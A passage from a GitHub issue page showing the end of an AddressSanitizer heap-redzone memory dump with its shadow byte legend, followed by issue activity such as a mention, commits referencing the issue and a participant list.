      0x0fec87537cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fec87537cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fec87537cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fec87537ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fec87537cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0fec87537d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
      0x0fec87537d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fec87537d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fec87537d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fec87537d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0fec87537d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==5914==ABORTING

![@dckc](https://avatars.githubusercontent.com/u/150986?s=60&v=4) dckc mentioned this issue

Mar 2, 2021

17 tasks

mkellner pushed a commit that referenced this issue

Mar 15, 2021

mkellner pushed a commit that referenced this issue

Mar 15, 2021

2 participants

 ![@phoddie](https://avatars.githubusercontent.com/u/6856458?s=52&v=4)![@rain6851](https://avatars.githubusercontent.com/u/13704697?s=52&v=4)

Tag

#ubuntu